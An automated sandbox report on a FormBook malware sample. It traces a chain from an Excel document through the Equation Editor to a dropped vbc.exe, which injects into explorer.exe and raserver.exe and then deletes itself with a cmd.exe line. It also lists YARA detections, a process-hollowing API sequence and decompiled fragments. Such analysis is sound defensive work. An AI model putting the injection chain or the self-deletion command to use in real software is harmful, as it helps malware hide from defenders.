                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Memory Usage

                                              High Level Behavior Distribution

                                              Behavior

                                              System Behavior

                                              General

                                              Start time:11:41:21
                                              Start date:15/09/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f120000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:11:41:45
                                              Start date:15/09/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:11:41:48
                                              Start date:15/09/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x330000
                                              File size:538624 bytes
                                              MD5 hash:A3F424F32B637CB917E6596FAE56E401
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:11:41:50
                                              Start date:15/09/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\vbc.exe
                                              Imagebase:0x330000
                                              File size:538624 bytes
                                              MD5 hash:A3F424F32B637CB917E6596FAE56E401
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:11:41:53
                                              Start date:15/09/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation: high

                                              General

                                              Start time: 11:42:05
                                              Start date: 15/09/2021
                                              Path: C:\Windows\SysWOW64\raserver.exe
                                              Wow64 process (32bit): true
                                              Commandline: C:\Windows\SysWOW64\raserver.exe
                                              Imagebase: 0x7c0000
                                              File size: 101888 bytes
                                              MD5 hash: 0842FB9AC27460E2B0107F6B3A872FD5
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation: moderate

                                              General

                                              Start time: 11:42:12
                                              Start date: 15/09/2021
                                              Path: C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit): true
                                              Commandline: /c del 'C:\Users\Public\vbc.exe'
                                              Imagebase: 0x4a410000
                                              File size: 302592 bytes
                                              MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges: true
                                              Has administrator privileges: true
                                              Programmed in: C, C++ or other language
                                              Reputation: high

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DD127

                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DD127

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DCB9B

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DCB9B

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DCA4A

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DCCDA

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DCA4A

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DC91F

                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DBB7E

                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DBB7E
                                                • Opcode ID: 757c7393f6ee94cedff6f3579fce4ed1ca1a08032af21caffa6cf52b8a499fbe
                                                • Instruction ID: 32c7fbc928a03dfd2c35dbb555369a83ba0e4ba595063e4ecb4a4edfa66a6d30
                                                • Opcode Fuzzy Hash: 757c7393f6ee94cedff6f3579fce4ed1ca1a08032af21caffa6cf52b8a499fbe
                                                • Instruction Fuzzy Hash: 2C217F754083809FCB06CF24E994B15BFB1EB46314F28C5DAD8498B266C33AD81ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474352838.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
                                                • Instruction ID: 518772c37159c57a545d4736c521f1d63dbf734da80eb6cad9390505a651334b
                                                • Opcode Fuzzy Hash: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
                                                • Instruction Fuzzy Hash: 2C11BB75504280DFDB02CF10E5C4B16BFA1FB84314F24C6A9D8094B256C33AD80ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474317648.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e539ccfe764a5362641a674a676b9b5384847131edd4c2fb4786216ac92baab
                                                • Instruction ID: a231182fbbd4e72c8ac850f95b5253975c0ec84e6557771862f03d5e05a06099
                                                • Opcode Fuzzy Hash: 2e539ccfe764a5362641a674a676b9b5384847131edd4c2fb4786216ac92baab
                                                • Instruction Fuzzy Hash: E101A73140C354DAD7508A15F888B67BB98EF51724F18C45AED045B186D775DC45CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474317648.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fe09cc5b261dde88f4018519d60bc20457e8d85282a4852395e2f6237f1b5a2
                                                • Instruction ID: fb6c10c5bd4f39a49eff7b1bb98959a6f4d5a77b37443257c9be0f0caef0b163
                                                • Opcode Fuzzy Hash: 5fe09cc5b261dde88f4018519d60bc20457e8d85282a4852395e2f6237f1b5a2
                                                • Instruction Fuzzy Hash: 05F06271408654ABEB508E15E8C8B63FF98EF91724F18C55AED485B286C379EC44CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: #kPi$Ob9
                                                • API String ID: 0-2289462526
                                                • Opcode ID: f82cfd1931d9e4927973ef3091d712f568787effe8e8e1349d275195333b0289
                                                • Instruction ID: 552b6a3249c87540c35778fd1ae48e2ae41db48c8c7db70c89cb869ea198845e
                                                • Opcode Fuzzy Hash: f82cfd1931d9e4927973ef3091d712f568787effe8e8e1349d275195333b0289
                                                • Instruction Fuzzy Hash: C771F474E09209CFCB08CFAAD9819DEFBF2EB89310F25946AD405B7314D7349A45CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: V/
                                                • API String ID: 0-714634060
                                                • Opcode ID: 53526e35d8a40ab641405d943ec260745846cca50cc2dc7989125c3a89bad351
                                                • Instruction ID: 6b66c03bbe8b87337e33ea861f6e883fad44477ac058d082facf175430088f0d
                                                • Opcode Fuzzy Hash: 53526e35d8a40ab641405d943ec260745846cca50cc2dc7989125c3a89bad351
                                                • Instruction Fuzzy Hash: F5716B70E1920A8FCB04CFE9C5805AEFBF2AF89310F65D42AD515AB355D3389A41DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Or_
                                                • API String ID: 0-645914214
                                                • Opcode ID: 095c800906c84699717d1b58ce967ff024fe2c56b20cebe8986f035c23cec434
                                                • Instruction ID: 0e0194707821b6525588d5a0efd575128527db0b25445290fad72884b35caf0b
                                                • Opcode Fuzzy Hash: 095c800906c84699717d1b58ce967ff024fe2c56b20cebe8986f035c23cec434
                                                • Instruction Fuzzy Hash: BD516871E0521A9FCB14CFA4D5818EEFBB2FF9A300F258516E505BB325D330AA41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: `xw
                                                • API String ID: 0-2944457182
                                                • Opcode ID: 9ed3c663e63dfed41cdc6454955372b3e93eaddd78e9c8174451c1da8ed83f48
                                                • Instruction ID: b5600303370d70de3973059a01e1bc7c722f63921465af6be21594bd32c868ad
                                                • Opcode Fuzzy Hash: 9ed3c663e63dfed41cdc6454955372b3e93eaddd78e9c8174451c1da8ed83f48
                                                • Instruction Fuzzy Hash: 42510871D0964A9FCB08CFAAC4815EEFBF2AF88310F64D46AC515E7394E3349A458F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: `xw
                                                • API String ID: 0-2944457182
                                                • Opcode ID: b11a717129dd8474882eb630a6efe23fb154e197dd053c941b9ffd220e8c1d53
                                                • Instruction ID: 55e25e06a6d3c884a4990799d1aeacaaa41d9770fdb43d48b40d2cfd5797667a
                                                • Opcode Fuzzy Hash: b11a717129dd8474882eb630a6efe23fb154e197dd053c941b9ffd220e8c1d53
                                                • Instruction Fuzzy Hash: 2E510A71D0864A9BCB08CFAAC5815EEFBF2BF88310F64D42AC515B7354E7349A418F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c36e4b9ee1959dd4b8ee7a08078e59daa5a0494c9859810ab81ccd678aaaae16
                                                • Instruction ID: e6e407b31f7c56c6413eb19d38bcf781125a253ecdf303688336211d1a1097b2
                                                • Opcode Fuzzy Hash: c36e4b9ee1959dd4b8ee7a08078e59daa5a0494c9859810ab81ccd678aaaae16
                                                • Instruction Fuzzy Hash: 81B14874E052198FCB08DFA9C9405AEFBF2AF88314F65C52AC409AB355E7349E42CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8fc72246b562d7c7424540c16fe0fc3ef629f8c5d0ace6b1a3e2975579805dd
                                                • Instruction ID: 41779ecf0596b20c941c516e6b58add949d69b18aeb65aeb93139597d4913667
                                                • Opcode Fuzzy Hash: c8fc72246b562d7c7424540c16fe0fc3ef629f8c5d0ace6b1a3e2975579805dd
                                                • Instruction Fuzzy Hash: F381DF74A25219CFCB04CFA9C5809AEFBF2FB88310F25956AD415AB324D334AA42DF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb3f8d422df84cb2ce754fdf4dc49a442910fc43c2e002801a3b8a55a0665bae
                                                • Instruction ID: 79ab2fa79075f61b16e4f1530df96a7c80e1945567b545b85c1d0b5a04492149
                                                • Opcode Fuzzy Hash: fb3f8d422df84cb2ce754fdf4dc49a442910fc43c2e002801a3b8a55a0665bae
                                                • Instruction Fuzzy Hash: 97810074A25219CFCB04CFA9C5809AEFBF2FF89310F25956AD415AB324D334AA42CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05c707a94814cd4c0084148ad5c15b90408385c26305dd85c6148a646cfdf5c5
                                                • Instruction ID: 18d8e009cf5c82964c4f6310c38c6f0555ae2c4385922786ed5d20923325d862
                                                • Opcode Fuzzy Hash: 05c707a94814cd4c0084148ad5c15b90408385c26305dd85c6148a646cfdf5c5
                                                • Instruction Fuzzy Hash: 20612670E0521AEFCB08CFA9D4416AEBBB2FF89310F64952AD405BB354D7389A42CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31f245635c24a1a766812ff58570ed1c241c7c8bba435bf2ca3eef862a7744b0
                                                • Instruction ID: e3051c521483987c0d1b065fe9e7481dca2cf203dc1ef96a228304be5305d4db
                                                • Opcode Fuzzy Hash: 31f245635c24a1a766812ff58570ed1c241c7c8bba435bf2ca3eef862a7744b0
                                                • Instruction Fuzzy Hash: E551F270E0560ADFCB08CFAAC5815AEFFB2EF99300F24946AC505B7315E7309A41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0adf0b2455065f05f16a129f5e676460953144cbed5eaa9f903329dd8221b424
                                                • Instruction ID: a72db807b31cf45967624b3eae9fa719d0d2fcc7bb5ccbb45befb9e137a0503e
                                                • Opcode Fuzzy Hash: 0adf0b2455065f05f16a129f5e676460953144cbed5eaa9f903329dd8221b424
                                                • Instruction Fuzzy Hash: 4551E2B0E0560ADBCB48CFAAC5815AEFBF2FB98340F25D46AC515B7314E7309A41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ab7e0ac55077e8cdbfda33350c418d9d79e42d0154c85dacb14ae917b27a9bd
                                                • Instruction ID: 87ca8f2144fa02effdff6995cb95ae191bcd0bdb9a9d7fb6e21e1e9571c68202
                                                • Opcode Fuzzy Hash: 0ab7e0ac55077e8cdbfda33350c418d9d79e42d0154c85dacb14ae917b27a9bd
                                                • Instruction Fuzzy Hash: 4B410374E0560ADBCB08CFE9C5818AFFBB2FB98340F25946AC515B7314E7309A41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7e43d6396bd874535293da452da07e61c2f06d1700320ebce461667a51731cb
                                                • Instruction ID: b96deb4200c1be81984d0024aa0da6733b3fca0f5c0b0990a8fb7d268d0dff42
                                                • Opcode Fuzzy Hash: b7e43d6396bd874535293da452da07e61c2f06d1700320ebce461667a51731cb
                                                • Instruction Fuzzy Hash: F331E4B5D192489FDB09CFBA98546EDBFB3AFC5600F05C1ABD048EA252D7304905CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57a34e37e8e1cfe67eaaddafee19a7957422b4d85e5f7532ea11d8a5a7a72b87
                                                • Instruction ID: f691bb519d13a970086d5defbf12dd5249c8e113fbcf6a05d94f518051b75c03
                                                • Opcode Fuzzy Hash: 57a34e37e8e1cfe67eaaddafee19a7957422b4d85e5f7532ea11d8a5a7a72b87
                                                • Instruction Fuzzy Hash: 0B31CFB1E042588FDB09CF6AD8947DEFBF2AB89300F05C1ABD409E7251EB344905CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bca712962f479c4644d21482cf97186c6c2bcf6788fb5b37ead4bcdbfd0ad04f
                                                • Instruction ID: c69f3226441a22828fb1fd21a86b4ee0fff0fd744049a247ffdbe9440a32d2c8
                                                • Opcode Fuzzy Hash: bca712962f479c4644d21482cf97186c6c2bcf6788fb5b37ead4bcdbfd0ad04f
                                                • Instruction Fuzzy Hash: D4210071E056588BEB08CFAB984029EFBF3AFC9300F19C1B7D908A7265DB3409568F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bee4136542f0e332160b52e66eeba54d8f9ebecdce691db28ce206c99238a8a
                                                • Instruction ID: eea7a71783edd0d0027e4ee0bc3e24f4e42fc7e9bf358386e9ee49ba7596f33f
                                                • Opcode Fuzzy Hash: 0bee4136542f0e332160b52e66eeba54d8f9ebecdce691db28ce206c99238a8a
                                                • Instruction Fuzzy Hash: 1E21DE71E056589FEB18CFAB9C406DEFBF3AFC9200F08C17AC918A6265DB3416458F15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E0041825B(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				void* _t20;
                                                				void* _t29;
                                                				void* _t30;
                                                				intOrPtr* _t31;
                                                				void* _t33;
                                                
                                                				_t15 = _a4;
                                                				_t31 = _a4 + 0xc48;
                                                				E00418DB0(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                                				_t6 =  &_a32; // 0x413d42
                                                				_t12 =  &_a8; // 0x413d42
                                                				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t30, _t33); // executed
                                                				return _t20;
                                                 			}

                                                APIs
                                                • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: B=A$B=A
                                                • API String ID: 2738559852-2767357659
                                                • Opcode ID: c1d190b4f162806fb183a3ae79776ce2aa4cf30dfcff1660487fdc85eef5882f
                                                • Instruction ID: 69bf9648ef28c73fce7a754ca7fe26902933c3b2325ec6aeb81f5bae00cfde62
                                                • Opcode Fuzzy Hash: c1d190b4f162806fb183a3ae79776ce2aa4cf30dfcff1660487fdc85eef5882f
                                                • Instruction Fuzzy Hash: C6F0E2B2210208ABCB04DF89DC80EEB77A9EF8C314F018248BA0D97241CA30E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4;
                                                				_t28 = _a4 + 0xc48;
                                                				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t6 =  &_a32; // 0x413d42
                                                				_t12 =  &_a8; // 0x413d42
                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                				return _t18;
                                                 			}

                                                APIs
                                                • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: B=A$B=A
                                                • API String ID: 2738559852-2767357659
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
